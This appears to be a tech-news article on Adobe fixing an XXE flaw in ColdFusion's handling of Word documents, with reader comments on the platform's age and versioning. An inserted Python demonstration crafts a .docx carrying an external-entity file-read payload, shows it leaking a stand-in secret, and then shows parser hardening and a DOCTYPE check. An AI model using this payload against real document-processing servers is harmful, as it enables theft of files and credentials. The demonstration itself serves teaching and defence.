Adobe ices ColdFusion server admin password, file hack hole

Adobe has patched a hole in ColdFusion that could have allowed attackers to read files and passwords stored on servers. The applications platform is used by some 30 million websites. The XML External Entity (XXE) injection vulnerability is triggered when XML-based Word documents are processed, Legal Hackers security researcher …
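The bug class the article describes, XXE triggered by the XML parts inside a Word (.docx) document, is easy to reproduce outside ColdFusion. The following is an added example, not code from Adobe, Apache POI or the article: it packs a constructed .docx-shaped zip whose `word/document.xml` declares an external entity pointing at a local file (a temporary file standing in for a server-side secret), then extracts the document text with Python's `xml.sax` (expat) once with external general entities enabled (the vulnerable setting) and once with them disabled, and finally shows an upload-time check that rejects any OOXML part carrying a `<!DOCTYPE` at all, since well-formed Office parts never need one. The file name, the `run_demo` helper and the secret contents are assumptions made for the demonstration.

```python
"""Added example (not vendor code): XXE via a Word document's XML part."""
import io
import os
import tempfile
import xml.sax
import zipfile
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Constructed stand-in for a sensitive file on the server that parses uploads.
SECRET_CONTENT = "db_password=hunter2\n"


def build_docx(document_xml: bytes) -> bytes:
    """Pack a minimal .docx-shaped zip: just the content-types part and the
    word/document.xml part that a text extractor reads (hypothetical layout)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def xxe_document_xml(file_uri: str) -> bytes:
    """word/document.xml whose only run text is a reference to an external
    entity, the classic XXE shape: the parser fetches file_uri for us."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE w:document [<!ENTITY xxe SYSTEM "{file_uri}">]>\n'
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r>'
        '<w:t>&xxe;</w:t></w:r></w:p></w:body></w:document>'
    ).encode()


class RunTextCollector(ContentHandler):
    """Collect the text of every <w:t> run, like a naive document-to-text step."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._in_t = False

    def startElement(self, name, attrs):
        if name == "w:t":
            self._in_t = True

    def endElement(self, name):
        if name == "w:t":
            self._in_t = False

    def characters(self, content):
        if self._in_t:
            self.parts.append(content)


def extract_text(docx_bytes: bytes, resolve_external_entities: bool) -> str:
    """Unzip word/document.xml and pull the run text through xml.sax (expat).
    resolve_external_entities=True is the vulnerable parser configuration."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        document_xml = z.read("word/document.xml")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = RunTextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document_xml))
    return "".join(handler.parts)


def has_doctype(docx_bytes: bytes) -> bool:
    """Upload-time check: OOXML parts never need a DTD, so a DOCTYPE in any
    XML part is a red flag; reject the file before it reaches an XML parser."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return any(
            name.endswith(".xml") and b"<!DOCTYPE" in z.read(name)
            for name in z.namelist()
        )


def run_demo() -> dict:
    """Create the stand-in secret, craft the document, run both parser modes."""
    fd, secret_path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(SECRET_CONTENT)
    try:
        evil = build_docx(xxe_document_xml(Path(secret_path).resolve().as_uri()))
        benign = build_docx(
            f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r>'
            '<w:t>hello</w:t></w:r></w:p></w:body></w:document>'.encode())
        return {
            "leaked": extract_text(evil, resolve_external_entities=True),
            "hardened": extract_text(evil, resolve_external_entities=False),
            "benign": extract_text(benign, resolve_external_entities=False),
            "flagged": has_doctype(evil),
            "benign_flagged": has_doctype(benign),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

With entity resolution on, the "document text" that comes back is the contents of the secret file; with it off, the entity reference expands to nothing and the file is never opened. Rejecting any part that contains a DOCTYPE is the cheaper, parser-independent defence and is what you want in front of a third-party document library you cannot easily reconfigure.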

  1. Bronek Kozicki Silver badge

    The real news here is ...

    "The ancient applications platform is used by some 30 million websites"

    Some people have no fear of anything. Or, more often, do not know enough to fear the thing they see.

    1. bdw429s

      Re: The real news here is ...

      The average age of web technology is about 23 yrs old. (HTML, SQL, Java, Ruby, Javascript, .NET, Python, etc) ColdFusion is 21 yrs old which literally makes it younger than average. I'm really curious how the author of this article justifies calling it "ancient". The versions affected by this bug are only a few years old and here's the kicker-- the bug wasn't even in ColdFusion proper!! It's a bug in the Apache POI libraries that they were bundling.

  2. Pascal Monett Silver badge

    Confusing version numbers - as usual

    Well, Coldfusion has apparently gone from Version 11 to Version 2016.

    That is an immense help when trying to determine version history. When will vendors decide upon a version numbering scheme and bloody stick to it ?

    Is that a Marketing idea ? Shoot them, please.

    1. Crazy Operations Guy Silver badge

      Re: Confusing version numbers - as usual

      Indeed. I've always very much preferred the X.Y.z versioning scheme.

      X is incremented when the product changes enough or introduces enough new functionality to make it a drop-in replacement for the previous version (e.g. it may need a DB schema change or no longer supports a certain set of operating systems). Or at the very least it represents a major milestone in development.

      Y is incremented when a new feature is implemented that doesn't require any changes to the rest of the system (although may prevent downgrades). Should be compatible with anything else within the 'X' version family.

      Z is the patch level: the system can be upgraded to a later 'z' version without any changes, and a system admin can upgrade without needing any testing. Usually a new version is produced monthly / twice-monthly.

      The vast majority of software follows this model, but too many prolific software projects don't (Linux Kernel, OS X, etc.).

      I can accept 2016 as a version number if the whole version is based on it like <year>.<month>.<day> and it has a very rapid development cycle (where new versions are built weekly, if not daily). Otherwise, it seems pretty pointless.

      1. bdw429s

        Re: Confusing version numbers - as usual

        Actually Adobe DOES use a standard version number; 2016 is just the "major" version. For instance, the current latest version of CF is 2016.0.02.299200, which represents update level 2, and the last bit is the build number. They've always used this -- the major version just had a little "jump" from 11. As far as marketing goes, they only use the major version, which is pretty much standard in a lot of software.

  3. Ol'Peculier

    Ancient applications platform?

    CF was released in 1995, a year after PHP. And the latest version was released only 7 months ago.

    I know you guys don't "get" CF, but it is used by a hell of a lot of very large companies and various government bodies. (yes, I use it and have done for since CF4.5...)

    1. Jonathan 27 Bronze badge

      It's not the age of the platform as a whole, but the age of the feature-set. PHP has been updated many times (and is still not considered state of the art), and includes full class support among other things. ColdFusion is very much behind the times feature-wise. I work with a wide variety of programming languages, including ColdFusion, and I would not recommend it for future projects. Adobe is just barely keeping the product alive at this point and you can be more productive using other tools.

      If you're one of those guys who "only knows ColdFusion", start learning Python, .NET MVC, Node.JS or Ruby on Rails. ColdFusion has passed its best before date at this point.

      1. bdw429s

        Please tell me specifically how ColdFusion as a platform is behind? It's a multi-paradigm modern JVM scripting language with OO and FP constructs, Java/.NET interop, more out-of-the-box integrations than any of the other langs you listed, enterprise modular MVC frameworks, CLI tooling, package management, and free open source engines. I know several languages, and I still choose CF for my everyday job due to its great productivity. What am I missing by using CF?

  4. This post has been deleted by its author

    1. quxinot Silver badge

      Re: Adobe fixes a bug...

      At least then you'd have gotten laid.

      Using Adobe products usually means you are the one getting screwed, instead.

    2. bdw429s

      Re: Adobe fixes a bug...

      Your comments are statistically _very_ inaccurate. ColdFusion has fewer vulnerabilities every year than PHP, Java, or .NET. In fact, Java and PHP literally have about 6 times more vulns found every year! Where are your stats coming from? Mine are right here:

      http://www.codersrevolution.com/blog/whos-had-more-vulns-redux-php-java-coldfusion-ror-or-net

Biting the hand that feeds IT © 1998–2020